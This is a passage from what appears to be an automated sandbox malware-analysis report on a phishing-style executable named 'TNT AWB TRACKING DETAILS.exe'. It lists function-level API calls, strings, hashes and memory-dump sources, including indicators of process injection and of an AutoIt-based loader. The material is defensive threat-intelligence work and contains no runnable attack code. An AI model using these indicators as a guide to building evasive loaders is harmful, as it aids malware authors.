                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorLast
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 2487901850-572801152
                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                      Function 03F3BC20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 03F3BB10: Sleep.KERNELBASE(000001F4), ref: 03F3BB21
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F3BD75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: UBM8B4AU2TOSGKDHHWU65WWEWJR1Y
                                      • API String ID: 2694422964-2818237491
                                      • Opcode ID: 1676a867c94d8d96a846387ef2b5f629b677fcffaa440bda4ff36f48a428f8cc
                                      • Instruction ID: b8aae9244561345d2aa1a5b20e0a441dd90ae2a89fc911978adfa908dccbf9ed
                                      • Opcode Fuzzy Hash: 1676a867c94d8d96a846387ef2b5f629b677fcffaa440bda4ff36f48a428f8cc
                                      • Instruction Fuzzy Hash: 42617230D08288DAEF15DBB4D858BEFBB75AF15304F044199E6487B2C1D7B90A48CB65
                                      Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcsncpy.LIBCMT ref: 00401C41
                                      • _wcscpy.LIBCMT ref: 00401C5D
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                      • String ID: Line:
                                      • API String ID: 1874344091-1585850449
                                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                      Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Close$OpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 1607946009-824357125
                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                      Function 03F3AB10 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F3B2CB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F3B361
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F3B383
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                      • Instruction ID: ac5ef66d3c6cdc6575b83e110a5bd9eb5943201294c172c825db97d44571c0c2
                                      • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                      • Instruction Fuzzy Hash: 7762F830A14258DBEB24CFA4C850BDEB376EF59300F1091A9D10DEB3A4E7769E81CB59
                                      Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                      Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                      Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                      • _free.LIBCMT ref: 004295A0
                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 3938964917-3187515760
                                      • Opcode ID: 270dd0ea9a5e8039f531707175cdd08c3ef27e69020102fad8003a9fe26c702a
                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                      • Opcode Fuzzy Hash: 270dd0ea9a5e8039f531707175cdd08c3ef27e69020102fad8003a9fe26c702a
                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                      Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: Error:
                                      • API String ID: 4104443479-232661952
                                      • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                      • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                      Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,0040F545,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,004A90E8,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                      • String ID: X$pWH
                                      • API String ID: 85490731-941433119
                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                      Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 00401B57
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                      • String ID: @EXITCODE
                                      • API String ID: 2734553683-3436989551
                                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                      Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                      Download Yara Rule
                                      Strings
                                      • C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, xrefs: 00410107
                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _strcat
                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 1765576173-1195542274
                                      • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                      • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                      Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                      Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 1794320848-0
                                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                      Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$CurrentTerminate
                                      • String ID:
                                      • API String ID: 2429186680-0
                                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                      Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
